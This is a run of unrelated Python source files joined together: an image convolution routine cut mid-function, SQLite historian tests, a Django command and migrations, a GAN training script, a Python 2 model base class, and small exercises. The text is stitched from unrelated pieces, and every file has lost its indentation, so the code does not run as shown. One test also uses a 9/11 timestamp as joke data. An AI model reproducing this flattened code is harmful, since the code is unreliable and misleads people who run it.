#the image we passed in is already grey
#get dimensions of the ORIGINAL image
img_height, img_width = image.shape
#we assume we will have a filter of odd size
#and it’s a square matrix
size_pad = filter_size - 1
# create a empty matrix filled with zero
ni_h = img_height + size_pad
ni_w = img_width + size_pad
new_img = numpy.zeros((ni_h, ni_w), 'uint8')
# copy image into matrix
new_img[(size_pad//2):(ni_h-(size_pad//2)), (size_pad//2):(ni_w-(size_pad//2))] = image
# flip the filter
flipped_filter = filter[::-1,::-1]
#a new image container
img_copy = image.copy()
# get the convoved value of each pixel
#remember here we are using the size of the ORIGINAL image
#because we want the size to be the same
for i in range(img_height):
for j in range(img_width):
#we use the padded image to calculate the convolution
#to deal with the edge
img_copy[i][j] = getPixelValue(new_img, flipped_filter, i, j)
return img_copy
if __name__ == '__main__':
f = numpy.array([[1/9,1/9,1/9],[1/9,1/9,1/9],[1/9,1/9,1/9]])[..., None]
#convert a 2D filter to a 3D filter => (3,3,3)
img_filter_3d = numpy.repeat(f, 3, axis=2)
#Load an color image in RGB => (3,3,3)
img=cv2.imread('waldo.png',cv2.IMREAD_COLOR)
R = img[:,:,0].copy()
G = img[:,:,1].copy()
B = img[:,:,2].copy()
R = convolution(R, img_filter_3d[0])
G = convolution(G, img_filter_3d[1])
B = convolution(B, img_filter_3d[2])
# result = numpy.zeros((img.shape[0], img.shape[1], 3))
result = cv2.merge((B,G,R))
cv2.imshow('result image',result)
cv2.waitKey(0)
|
from gevent import os, subprocess
import pytest
from setuptools import glob
from volttron.platform.dbutils.sqlitefuncts import SqlLiteFuncts
TOPICS_TABLE = "topics"
DATA_TABLE = "data"
META_TABLE = "meta"
METAMETA_TABLE = "metameta"
AGG_TOPICS_TABLE = "aggregate_topics"
AGG_META_TABLE = "aggregate_meta"
TABLE_PREFIX = ""
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_setup_historian_tables(sqlitefuncts_db_not_initialized):
expected_tables = {"data", "meta", "topics"}
sqlitefuncts_db_not_initialized.setup_historian_tables()
actual_tables = get_tables()
assert actual_tables == expected_tables
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_record_table_definitions(sqlitefuncts_db_not_initialized):
table_defs = {
"table_prefix": "prefixtab",
"data_table": "data",
"topics_table": "topics",
"meta_table": "meta",
}
meta_table_name = "metameta"
init_historian_tables(sqlitefuncts_db_not_initialized)
expected_tables = {"data", "meta", "metameta", "topics"}
sqlitefuncts_db_not_initialized.record_table_definitions(
table_defs, meta_table_name
)
actual_tables = get_tables()
assert actual_tables == expected_tables
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_setup_aggregate_historian_tables(sqlitefuncts):
meta_table_name = "metameta"
expected_tables = {
"data",
"aggregate_meta",
"meta",
"aggregate_topics",
"topics",
"metameta",
}
sqlitefuncts.setup_aggregate_historian_tables(meta_table_name)
actual_tables = get_tables()
assert actual_tables == expected_tables
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
@pytest.mark.parametrize(
"topic_ids, id_name_map, expected_values",
[
([42], {42: "topic42"}, {"topic42": []}),
([43], {43: "topic43"}, {"topic43": [("2020-06-01T12:30:59.000000", [2, 3])]}),
],
)
def test_query(sqlitefuncts, topic_ids, id_name_map, expected_values):
init_database(sqlitefuncts)
query = """INSERT OR REPLACE INTO data VALUES('2020-06-01 12:30:59',43,'[2,3]')"""
query_db(query)
actual_results = sqlitefuncts.query(topic_ids, id_name_map)
assert actual_results == expected_values
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
@pytest.mark.parametrize(
"history_limit_timestamp, storage_limit_gb, expected_data",
[
("2020-06-01 12:30:59", None, []),
(None, 10, ["2000-06-01 12:30:59|43|[2,3]", "2000-06-01 12:30:58|42|[2,3]"]),
("2020-06-01 12:30:59", 10, []),
],
)
def test_manage_db_size(
sqlitefuncts, history_limit_timestamp, storage_limit_gb, expected_data
):
query = (
"INSERT OR REPLACE INTO data VALUES('2000-06-01 12:30:59',43,'[2,3]'); "
"INSERT OR REPLACE INTO data VALUES('2000-06-01 12:30:58',42,'[2,3]')"
)
query_db(query)
data_before_resize = [
"2000-06-01 12:30:59|43|[2,3]",
"2000-06-01 12:30:58|42|[2,3]",
]
assert get_all_data(DATA_TABLE) == data_before_resize
sqlitefuncts.manage_db_size(history_limit_timestamp, storage_limit_gb)
assert get_all_data(DATA_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_insert_meta(sqlitefuncts):
assert get_all_data(META_TABLE) == []
topic_id = "44"
metadata = "foobar44"
expected_data = ['44|"foobar44"']
res = sqlitefuncts.insert_meta(topic_id, metadata)
sqlitefuncts.commit()
assert res is True
assert get_all_data(META_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_insert_data(sqlitefuncts):
assert get_all_data(DATA_TABLE) == []
ts = "2001-09-11 08:46:00"
topic_id = "11"
data = "1wtc"
expected_data = ['2001-09-11 08:46:00|11|"1wtc"']
res = sqlitefuncts.insert_data(ts, topic_id, data)
sqlitefuncts.commit()
assert res is True
assert get_all_data(DATA_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_insert_topic(sqlitefuncts):
assert get_all_data(TOPICS_TABLE) == []
topic = "football"
expected_data = ["1|football"]
res = sqlitefuncts.insert_topic(topic)
sqlitefuncts.commit()
assert res == 1
assert get_all_data(TOPICS_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_update_topic(sqlitefuncts):
query = "INSERT INTO topics (topic_name) values ('football')"
query_db(query)
assert get_all_data(TOPICS_TABLE) == ["1|football"]
res = sqlitefuncts.update_topic("basketball", 1)
sqlitefuncts.commit()
assert res is True
assert get_all_data("topics") == ["1|basketball"]
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_get_aggregation_list(sqlitefuncts):
assert sqlitefuncts.get_aggregation_list() == [
"AVG",
"MIN",
"MAX",
"COUNT",
"SUM",
"TOTAL",
"GROUP_CONCAT",
]
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_insert_agg_topic(sqlitefuncts):
assert get_all_data(AGG_TOPICS_TABLE) == []
topic = "agg_topics"
agg_type = "AVG"
agg_time_period = "2019"
expected_data = ["1|agg_topics|AVG|2019"]
sqlitefuncts.insert_agg_topic(topic, agg_type, agg_time_period)
sqlitefuncts.commit()
assert get_all_data(AGG_TOPICS_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_update_agg_topic(sqlitefuncts):
query = "INSERT INTO aggregate_topics (agg_topic_name, agg_type, agg_time_period) values ('cars', 'SUM', '2100ZULU')"
query_db(query)
assert get_all_data(AGG_TOPICS_TABLE) == ["1|cars|SUM|2100ZULU"]
new_agg_topic_name = "boats"
expected_data = ["1|cars|SUM|2100ZULU"]
res = sqlitefuncts.update_agg_topic(1, new_agg_topic_name)
assert res is True
assert get_all_data(AGG_TOPICS_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_insert_agg_meta(sqlitefuncts):
assert get_all_data(AGG_META_TABLE) == []
topic_id = 42
metadata = "meaning of life"
expected_data = ['42|"meaning of life"']
res = sqlitefuncts.insert_agg_meta(topic_id, metadata)
sqlitefuncts.commit()
assert res is True
assert get_all_data(AGG_META_TABLE) == expected_data
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_get_topic_map(sqlitefuncts):
query = "INSERT INTO topics (topic_name) values ('football');INSERT INTO topics (topic_name) values ('netball');"
query_db(query)
expected_topic_map = (
{"football": 1, "netball": 2},
{"football": "football", "netball": "netball"},
)
assert get_all_data(TOPICS_TABLE) == ["1|football", "2|netball"]
actual_topic_map = sqlitefuncts.get_topic_map()
assert actual_topic_map == expected_topic_map
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_get_agg_topics(sqlitefuncts):
query = (
"INSERT INTO aggregate_topics (agg_topic_name, agg_type, agg_time_period ) "
"values('topic_name', 'AVG', '2001');"
)
query_db(query)
sqlitefuncts.insert_agg_meta(1, {"configured_topics": "great books"})
sqlitefuncts.commit()
expected_topics = [("topic_name", "AVG", "2001", "great books")]
actual_topics = sqlitefuncts.get_agg_topics()
assert actual_topics == expected_topics
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_agg_topics_should_return_empty_on_nonexistent_table(
sqlitefuncts_db_not_initialized,
):
init_historian_tables(sqlitefuncts_db_not_initialized)
actual_topic_map = sqlitefuncts_db_not_initialized.get_agg_topics()
assert actual_topic_map == []
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_get_agg_topic_map(sqlitefuncts):
query = (
"INSERT INTO aggregate_topics (agg_topic_name, agg_type, agg_time_period ) "
"values('topic_name', 'AVG', '2001');"
)
query_db(query)
expected_acutal_topic_map = {("topic_name", "AVG", "2001"): 1}
actual_topic_map = sqlitefuncts.get_agg_topic_map()
assert actual_topic_map == expected_acutal_topic_map
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_agg_topic_map_should_return_empty_on_nonexistent_table(
sqlitefuncts_db_not_initialized,
):
init_historian_tables(sqlitefuncts_db_not_initialized)
actual_topic_map = sqlitefuncts_db_not_initialized.get_agg_topic_map()
assert actual_topic_map == {}
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
@pytest.mark.parametrize(
"topic_1, topic_2, topic_3, topic_pattern, expected_topics",
[
("'football'", "'foobar'", "'xzxzxccx'", "foo", {"football": 1, "foobar": 2}),
("'football'", "'foobar'", "'xzxzxccx'", "ba", {"football": 1, "foobar": 2}),
("'football'", "'foobar'", "'xzxzxccx'", "ccx", {"xzxzxccx": 3}),
("'fotball'", "'foobar'", "'xzxzxccx'", "foo", {"foobar": 2}),
("'football'", "'foooobar'", "'xzxzxccx'", "foooo", {"foooobar": 2}),
(
"'FOOtball'",
"'ABCFOOoXYZ'",
"'XXXfOoOo'",
"foo",
{"FOOtball": 1, "ABCFOOoXYZ": 2, "XXXfOoOo": 3},
),
],
)
def test_query_topics_by_pattern(
sqlitefuncts, topic_1, topic_2, topic_3, topic_pattern, expected_topics
):
query = (
f"INSERT INTO topics (topic_name) values ({topic_1});"
f"INSERT INTO topics (topic_name) values ({topic_2});"
f"INSERT INTO topics (topic_name) values ({topic_3});"
)
query_db(query)
actual_topics = sqlitefuncts.query_topics_by_pattern(topic_pattern)
assert actual_topics == expected_topics
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_create_aggregate_store(sqlitefuncts):
agg_type = "AVG"
agg_time_period = "1984"
expected_new_agg_table = "AVG_1984"
expected_indexes = ["0|idx_AVG_1984|0|c|0", "1|sqlite_autoindex_AVG_1984_1|1|u|0"]
result = sqlitefuncts.create_aggregate_store(agg_type, agg_time_period)
assert result is True
assert expected_new_agg_table in get_tables()
actual_indexes = get_indexes(expected_new_agg_table)
assert actual_indexes == expected_indexes
@pytest.mark.sqlitefuncts
@pytest.mark.dbutils
def test_collect_aggregate(sqlitefuncts):
query = (
"INSERT OR REPLACE INTO data values('2020-06-01 12:30:59', 42, '2');"
"INSERT OR REPLACE INTO data values('2020-06-01 12:31:59', 43, '8');"
)
query_db(query)
topic_ids = [42, 43]
agg_type = "avg"
expected_aggregate = (5.0, 2)
actual_aggregate = sqlitefuncts.collect_aggregate(topic_ids, agg_type)
assert actual_aggregate == expected_aggregate
def get_indexes(table):
res = query_db(f"""PRAGMA index_list({table})""")
return res.splitlines()
def get_tables():
result = query_db(""".tables""")
res = set(result.replace("\n", "").split())
return res
def get_all_data(table):
q = f"""SELECT * FROM {table}"""
res = query_db(q)
return res.splitlines()
def query_db(query):
output = subprocess.run(
["sqlite3", "data/historian.sqlite", query], text=True, capture_output=True
)
# check_returncode() will raise a CalledProcessError if the query fails
# see https://docs.python.org/3/library/subprocess.html#subprocess.CompletedProcess.returncode
output.check_returncode()
return output.stdout
@pytest.fixture()
def sqlitefuncts_db_not_initialized():
connect_params = {"database": "data/historian.sqlite"}
table_names = {
"data_table": DATA_TABLE,
"topics_table": TOPICS_TABLE,
"meta_table": META_TABLE,
"agg_topics_table": AGG_TOPICS_TABLE,
"agg_meta_table": AGG_META_TABLE,
}
client = SqlLiteFuncts(connect_params, table_names)
yield client
# Teardown
if os.path.isdir("./data"):
files = glob.glob("./data/*", recursive=True)
for f in files:
os.remove(f)
os.rmdir("./data/")
@pytest.fixture()
def sqlitefuncts(sqlitefuncts_db_not_initialized):
init_database(sqlitefuncts_db_not_initialized)
yield sqlitefuncts_db_not_initialized
def init_database(sqlitefuncts_client):
sqlitefuncts_client.setup_historian_tables()
table_defs = {
"table_prefix": TABLE_PREFIX,
"data_table": DATA_TABLE,
"topics_table": TOPICS_TABLE,
"meta_table": META_TABLE,
}
meta_table_name = METAMETA_TABLE
sqlitefuncts_client.record_table_definitions(table_defs, meta_table_name)
sqlitefuncts_client.setup_aggregate_historian_tables(meta_table_name)
def init_historian_tables(sqlitefuncts_client):
sqlitefuncts_client.setup_historian_tables()
|
from django.core.management.base import BaseCommand
from apps.utils.sprinklr import SprinklrService
from apps.web.models import Recipe
class Command(BaseCommand):
help = 'Calls the sprinklr service'
def add_arguments(self, parser):
parser.add_argument(
'--recipe_ratings',
action='store',
dest='recipe_ratings',
default='',
help='Update recipe ratings.'
)
def handle(self, *args, **options):
sprinklr = SprinklrService()
if options['recipe_ratings']:
product_id = options['recipe_ratings']
recipe = Recipe.objects.get(slug=product_id)
if recipe:
self.get_recipe_average(recipe, sprinklr)
else:
recipes = Recipe.objects.all()
for recipe in recipes:
self.get_recipe_average(recipe, sprinklr)
def get_recipe_average(self, recipe, sprinklr):
average_rating = sprinklr.recipe_ratings(recipe_id=recipe.slug)
if average_rating:
recipe.average_rating = average_rating
recipe.save()
self.stdout.write('Finished updating recipe `{0}` review.'.format(recipe.slug))
|
from __future__ import annotations
import pytest
from hooks.validate_django_model_field_names import boolean_validator
@pytest.mark.parametrize(
('field_name', 'expected_is_valid'), [
('is_accepted', True),
('was_migrated_from_specialties', True),
('has_public_link_access', True),
('needs_plastic_cards', True),
('should_allow_dispatch_for_disabled', True),
('franchise_was_changed', True),
('accepted', False),
('allow_dispatch_for_disabled', False),
('available_for_adults', False),
('need_med_consent', False),
('pay_lock', False),
]
)
def test_boolean_validator(field_name, expected_is_valid):
assert boolean_validator.validate(field_name) is expected_is_valid
|
from nose.tools import *
from exercises import ex13
def test_max_in_list():
'''
Confirm we are finding the largest number
'''
test_max_in_list = ex13.max_in_list([1, 2, 3, 4, 2, 6, 2])
assert_equal(test_max_in_list, 6)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import os
from torchvision import datasets, transforms
from torchvision.utils import save_image
from models import Gnet, Dnet, Qnet, FrontEnd, weights_init
from myUtils import save_checkpoint, load_checkpoint
class args:
seed = 0
cuda = True
bs = 100
epochs = 100
chkpt_path = './model/'
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.cuda else "cpu")
class log_gaussian:
def __call__(self, x, mu, var):
logli = -0.5*(var.mul(2*np.pi)+1e-6).log() - \
(x-mu).pow(2).div(var.mul(2.0)+1e-6)
return logli.sum(1).mean().mul(-1)
class Trainer():
def __init__(self, args):
self.gnet = Gnet().apply(weights_init).to(device)
self.dnet = Dnet().apply(weights_init).to(device)
self.qnet = Qnet().apply(weights_init).to(device)
self.frontEnd = FrontEnd().apply(weights_init).to(device)
self.chkpt_path = args.chkpt_path
self.start_epoch = 0
self.optimizerFnD = torch.optim.Adam([
{'params':self.frontEnd.parameters()},
{'params':self.dnet.parameters()}], lr=2e-4, betas=(0.5, 0.99))
self.optimizerGnQ = torch.optim.Adam([
{'params':self.gnet.parameters()},
{'params':self.qnet.parameters()}], lr=1e-3, betas=(0.5, 0.99))
self.criterionD = nn.BCELoss()
self.criterionQ_dis = nn.CrossEntropyLoss()
self.criterionQ_con = log_gaussian()
self.batch_size = args.bs
self.class_num = 10
self.epochs = args.epochs
self.dataset = datasets.MNIST('./dataset', transform=transforms.ToTensor(), download=True)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=self.batch_size,
shuffle=True, num_workers=1)
self.cat_distribut = torch.distributions.categorical.Categorical(
torch.ones(self.class_num)*(1.0/self.class_num))
self.unifrom = torch.distributions.uniform.Uniform(-1, 1)
# juet for test
# fixed random variables
c = np.linspace(-1, 1, 10).reshape(1, -1)
c = np.repeat(c, 10, 0).reshape(-1, 1)
self.c1 = torch.from_numpy(np.hstack([c, np.zeros_like(c)])).to(torch.float32)
self.c2 = torch.from_numpy(np.hstack([np.zeros_like(c), c])).to(torch.float32)
idx = np.arange(10).repeat(10)
one_hot = np.zeros((100, 10))
one_hot[range(100), idx] = 1
self.on_hot = torch.from_numpy(one_hot).to(torch.float32)
self.fix_noise = torch.Tensor(100, 62).uniform_(-1, 1)
def noise_sample(self, bs, dis_dim, con_dim=2, noise_dim=62):
c_dis = torch.zeros(bs, dis_dim)
samples = self.cat_distribut.sample((bs, 1))
c_dis[range(bs),samples.view(-1)] = 1.0
c_con = self.unifrom.sample((bs, con_dim))
noise = self.unifrom.sample((bs, noise_dim))
z = torch.cat([noise.clone(), c_dis.clone(), c_con.clone()], 1).view(-1, dis_dim+con_dim+noise_dim, 1, 1)
return z, samples.view(bs), c_con.clone()
def train(self, epoch):
for num_iters, batch_data in enumerate(self.dataloader):
self.optimizerFnD.zero_grad()
# Training D and frontEnd
# for real data
self.frontEnd.train()
self.dnet.train()
self.gnet.train()
self.qnet.train()
x_real, _ = batch_data
x_real = x_real.to(device)
bs = x_real.size(0)
labels = torch.ones(bs, 1).to(device)
fe1 = self.frontEnd(x_real)
probs_real = self.dnet(fe1)
loss_real = self.criterionD(probs_real, labels)
loss_real.backward()
# for fake data
z, target, c_con = self.noise_sample(bs, self.class_num, con_dim=2, noise_dim=62)
z = z.to(device)
target = target.to(device)
c_con = c_con.to(device)
x_fake = self.gnet(z)
fe2 = self.frontEnd(x_fake.detach())
probs_fake = self.dnet(fe2)
labels.data.fill_(0.0)
loss_fake = self.criterionD(probs_fake, labels)
loss_fake.backward()
D_loss = loss_real + loss_fake
self.optimizerFnD.step()
# Training G and Q
self.optimizerGnQ.zero_grad()
self.frontEnd.train()
self.dnet.train()
self.gnet.train()
self.qnet.train()
fe = self.frontEnd(x_fake)
probs_fake = self.dnet(fe)
labels.data.fill_(1.0)
loss_reconstruct = self.criterionD(probs_fake, labels)
q_logits, q_mu, q_var = self.qnet(fe)
loss_dis = self.criterionQ_dis(q_logits, target)
loss_con = self.criterionQ_con(c_con, q_mu, q_var)
G_loss = loss_reconstruct + loss_dis + loss_con*0.1
G_loss.backward()
self.optimizerGnQ.step()
# logging
if num_iters % 100 == 0:
print('Epoch/Iter:{0}/{1}, Dloss: {2}, Gloss: {3}'.format(
epoch, num_iters, D_loss.item(),
G_loss.item()
))
self.gnet.eval()
z = torch.cat([self.fix_noise, self.on_hot, self.c1], 1).view(-1, 74, 1, 1).to(device)
x_save = self.gnet(z)
save_image(x_save, './tmp/c1.png', nrow=10)
z = torch.cat([self.fix_noise, self.on_hot, self.c2], 1).view(-1, 74, 1, 1).to(device)
x_save = self.gnet(z)
save_image(x_save.data, './tmp/c2.png', nrow=10)
def run(self):
self.load()
for epoch in range(self.start_epoch, self.epochs):
self.train(epoch)
self.save()
self.start_epoch += 1
def save(self, is_best=False):
state_dict = {
'epoch': self.start_epoch + 1,
'G': self.gnet.state_dict(),
'D': self.dnet.state_dict(),
'Q': self.qnet.state_dict(),
'FE': self.frontEnd.state_dict(),
'optimFnD': self.optimizerFnD.state_dict(),
'optimGnQ': self.optimizerGnQ.state_dict(),
}
save_checkpoint(state_dict, is_best, file_path=self.chkpt_path)
def load(self, is_best=False):
checkpoint = load_checkpoint(is_best, file_path=self.chkpt_path)
if checkpoint:
self.start_epoch = checkpoint['epoch']
self.gnet.load_state_dict(checkpoint['G'])
self.dnet.load_state_dict(checkpoint['D'])
self.qnet.load_state_dict(checkpoint['Q'])
self.frontEnd.load_state_dict(checkpoint['FE'])
self.optimizerFnD.load_state_dict(checkpoint['optimFnD'])
self.optimizerGnQ.load_state_dict(checkpoint['optimGnQ'])
print("=> loaded checkpoint (epoch {})"
.format(checkpoint['epoch']))
if __name__ == "__main__":
test_train = Trainer(args)
test_train.run()
|
"""Module that contains BaseModel abstract class"""
from abc import ABCMeta, abstractmethod
import numpy as np
class BaseModel(object):
"""Abstract class that defines common methods for all models"""
__metaclass__ = ABCMeta
def __init__(self, configs, score_method, predict_as_probability):
self.configs_ = configs
self.score_method_ = score_method
self.predict_as_probability_ = predict_as_probability
@abstractmethod
def init(self):
"""Abstract method. Should initialize all components from a model"""
pass
@abstractmethod
def fit(self, input_data, targets):
"""Abstract method. Should find the parameters of the model from the
input_data"""
pass
@abstractmethod
def predict(self, input_data):
"""Abstract method. Should make predictions for the input_data from the
trained model"""
pass
@abstractmethod
def get_name(self):
"""Abstract method. Should return the label associated with a model
(used for printing)"""
pass
def evaluate_predictions(self, input_data, targets, is_log_target):
"""Evaluate the performance of a model based on predictions"""
predictions = self.predict(input_data)
if is_log_target:
score_targets = np.exp(targets)
score_predictions = np.exp(predictions)
else:
score_targets = targets
score_predictions = predictions
return self.score_method_(score_predictions, score_targets)
def evaluate_time_window_predictions(self, input_data, time_window,
is_log_target):
"""Evaluate the performance of a model based on predictions using a time window"""
pred_data = np.array([time_series[:-time_window] for time_series in input_data])
targets = np.array([time_series[-time_window:] for time_series in input_data])
predictions = self.predict(pred_data)
if is_log_target:
score_targets = np.exp(targets)
score_predictions = np.exp(predictions)
else:
score_targets = targets
score_predictions = predictions
return self.score_method_(score_predictions, score_targets)
def estimate_performance(self, data, split_indexes):
"""Method used to estimate the performance of the model"""
scores = []
is_log_target = data.is_log_target()
for train_index, test_index in split_indexes:
fit_inputs = data.get_features(train_index)
fit_targets = data.get_targets(train_index)
score_inputs = data.get_features(test_index)
score_targets = data.get_targets(test_index)
self.fit(fit_inputs, fit_targets)
train_score = self.evaluate_predictions(fit_inputs, fit_targets,
is_log_target)
print self.get_name(), 'Training score:', train_score
val_score = self.evaluate_predictions(score_inputs, score_targets,
is_log_target)
scores.append(val_score)
print self.get_name(), 'Last validation score:', scores[-1]
print self.get_name(), 'scores:', scores
print self.get_name(), 'final performance:', np.mean(scores), '\n'
return np.mean(scores)
def cv_predict(self, data, splitter):
"""Method used to estimate the performance of a model using cross
validation (as used in stacking). A bin used for predictions will not
be used to train the model"""
predictions = np.empty([data.get_features().shape[0],])
for train_index, test_index in splitter.split(data):
fit_inputs = data.get_features(train_index)
fit_targets = data.get_targets(train_index)
self.fit(fit_inputs, fit_targets)
score_inputs = data.get_features(test_index)
if not data.is_log_target():
predictions[test_index] = self.predict(score_inputs)
else:
predictions[test_index] = np.exp(self.predict(score_inputs))
return predictions
def estimate_timeseries_performance(self, data, split_indexes, time_window):
"""Method used to estimate the performance of a time series model"""
scores = []
is_log_target = data.is_log_target()
for train_index, test_index in split_indexes:
fit_inputs = data.get_features(train_index)
score_targets = data.get_features(test_index)
self.fit(fit_inputs, None)
train_score = self.evaluate_time_window_predictions(fit_inputs, time_window,
is_log_target)
print self.get_name(), 'Training score:', train_score
val_score = self.evaluate_predictions(fit_inputs, score_targets,
is_log_target)
scores.append(val_score)
print self.get_name(), 'Last validation score:', scores[-1]
print self.get_name(), 'scores:', scores
print self.get_name(), 'final performance:', np.mean(scores), '\n'
return np.mean(scores)
|
#!/usr/bin/env python3
__all__ = ["Expense", "BaseExpencesManager", "ExpencesManager"]
from collections import defaultdict, namedtuple
from operator import itemgetter
Expense = namedtuple("Expense", ("category", "amount"))
class BaseExpencesManager:
expenses = []
def add(self, expense):
self.expenses.append(expense)
def aggregate_by_category(self, expense_threshold=0):
# do not include expenses less than threshold
aggregated_expenses = defaultdict(int)
for expense in self.expenses:
expense_category, expense_amount = expense
if expense_amount >= expense_threshold:
aggregated_expenses[expense_category] += expense_amount
return aggregated_expenses
class ExpencesManager(BaseExpencesManager):
@staticmethod
def report(expenses):
sorted_expenses = sorted(expenses.items(), key=itemgetter(1))
for category, amount in sorted_expenses:
print(f"{category}: {amount}")
if __name__ == "__main__":
expenses = ExpencesManager()
test_expenses = (
Expense("food", 4),
Expense("food", 3),
Expense("car", 3),
Expense("dog", 1),
)
for expense in test_expenses:
expenses.add(expense)
expenses.report(expenses.aggregate_by_category(expense_threshold=2))
|
# metros quadrados para acres
m = float(input('Digite o valor em metros quadrados: '))
a = m * 0.000247
print(f'O valor em acres é {a}.')
|
import sys
sys.setrecursionlimit(1 << 20)
INF = float('inf')
def read_int_list():
return list(map(int, input().split()))
def read_ints():
return map(int, input().split())
from collections import deque
def mainQ():
S = input()
q = deque([S])
cands = ['dream', 'dreamer', 'erase', 'eraser']
res = False
while q:
s = q.popleft()
for cand in cands:
if s[:len(cand)] == cand:
if s == cand:
print('YES')
return
q.append(s[len(cand):])
print('NO')
def main():
S = input()
S = S[::-1]
cands = ['dream', 'dreamer', 'erase', 'eraser']
cands = [c[::-1] for c in cands]
# print(cands)
cur = 0
while cur < len(S):
for cand in cands:
if S[cur:cur + len(cand)] == cand:
cur += len(cand)
break
else:
print('NO')
return
print('YES')
main()
|
import numpy as np
from gsm import GameOver, GamePhase, GameActions, GameObject
from gsm import tset, tdict, tlist
from gsm import SwitchPhase, PhaseComplete
from gsm.common import TurnPhase
from ..ops import get_next_market
class MarketPhase(TurnPhase):
def execute(self, C, player=None, action=None):
if action is None:
# self.neutrals = tset(C.deck.draw(C.config.rules.market_cards))
self.num = len(self.market[self.player])
# del self.sel[self.player]
C.log.writef('{} may take {} action{}', self.player, self.num, 's' if self.num > 1 else '')
return
assert player == self.player, 'wrong player: {}'.format(player)
obj, *other = action
if 'trade' in self:
pass
else:
self.num -= 1
pass
if self.num == 0:
nxt = get_next_market(self.sel)
if nxt is None:
raise PhaseComplete
else:
raise SwitchPhase('market', stack=False, player=nxt, market=self.market[nxt])
raise NotImplementedError
def encode(self, C):
# complete trade
if 'trade' in self:
out = GameActions('Choose second card to exchange')
with out('cancel', 'Cancel trade'):
out.add('cancel')
with out('trade', 'Second card to exchange'):
cards = tset()
if self.trade not in C.state.market:
cards.update(C.state.market)
for p in C.players:
if self.trade not in p.market:
cards.update(p.market)
out.add(cards)
else:
out = GameActions('You have {} actions left'.format(self.num))
# trade
# 1. can choose card from some other market
# 2. can choose card from my own market
# get cards from all markets except my own (self.player)
with out('trade', 'Select card from other player markets'):
for p, cards in self.market.items():
if p == self.player and 'trade' not in self:
continue
elif 'trade' in self and p != self.player:
continue
opts = cards
if len(opts):
out.add(opts)
print('market phase out',out)
# pickup
# can pickup card from my own market
# play royal
# can play any royal from my hand
# royal action
# can take action of current royal, let's say king
# exchange building
# 1. can pick up one card from one of my buildings
# 2. pick one card from my market OR my hand
return tdict({self.player: out})
|
a = 4
b = 2
c = 1
d = 4
e = 5
f = 6
Comp_var = {a,b,c,d,e,f} # Множество не содержит повторяющиеся элементы
print(Comp_var)
print(len(Comp_var))
if ( len(Comp_var) == 6 ):
print("Все разные")
else:
print("Есть одинаковые")
|
import tensorflow as tf
import utili.dataset_factory as datasets
from modules import resnet_v1
import utili.config as config
def cls_score_layer(input):
score = tf.keras.layers.Conv2D(18,(1,1),activation=tf.nn.softmax,name="rpn_cls_score")(input)
score = tf.reshape(score, [-1, 2]) # -1 means flatten to 1-D
score = tf.nn.softmax(score)
return score
def bbox_pred_layer(input):
bbox = tf.keras.layers.Conv2D(36,(1,1),name="rpn_bbox_pred")(input)
return bbox
#import the inspect_checkpoint library
#from tensorflow.python.tools import inspect_checkpoint as chkp
#chkp.print_tensors_in_checkpoint_file("data/resnet_v1_50.ckpt",tensor_name='',all_tensors=False) #set False to only print tensor name and shape
def rpn(inputs):
with tf.name_scope("rpn"):
#raw_feat,end_points = resnet_v1.resnet_v1_50(inputs,num_classes=None,is_training=True,global_pool=True,output_stride=None,reuse=None,scope='resnet_v1_50') #13x13x256
#conv+relu
features = tf.keras.layers.Conv2D(256, (3, 3), padding='same',activation='relu',name = "conv_afer_resnet")(inputs)
scores = cls_score_layer(features) # (N,H,W,Ax2) A=9
bbox = bbox_pred_layer(features) # (N,H,W,Ax4) A=9
return scores,bbox
#saver = tf.train.Saver()
#saver.restore()
|
import plotly.express as px
import pandas as pd
import csv
df = pd.read_csv('file1.csv')
fig = px.scatter(df,x='Temperature',y='Ice-cream Sales( ₹ )')
fig.show() |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-12 20:59
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0007_profile_course_combo'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='course_combo',
field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), blank=True, size=None),
),
]
|
#!/usr/bin/env python3
import aerospike
def main():
if '__version__' in dir(aerospike):
print(("Python client version is %s" % aerospike.__version__))
else:
print("don't know what Python client version is")
if 'MAP_RETURN_UNORDERED_MAP' in dir(aerospike):
print(("Python client supports MAP_RETURN_UNORDERED_MAP (%s)" % aerospike.MAP_RETURN_UNORDERED_MAP))
else:
print("Python client does not support MAP_RETURN_UNORDERED_MAP")
main()
|
# Generated by Django 3.1.1 on 2020-10-01 16:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0002_prices_value'),
]
operations = [
migrations.CreateModel(
name='clients',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField()),
('haghighiBuyVolume', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
('hoghooghiBuyVolume', models.DecimalField(decimal_places=0, default=0, max_digits=15)),
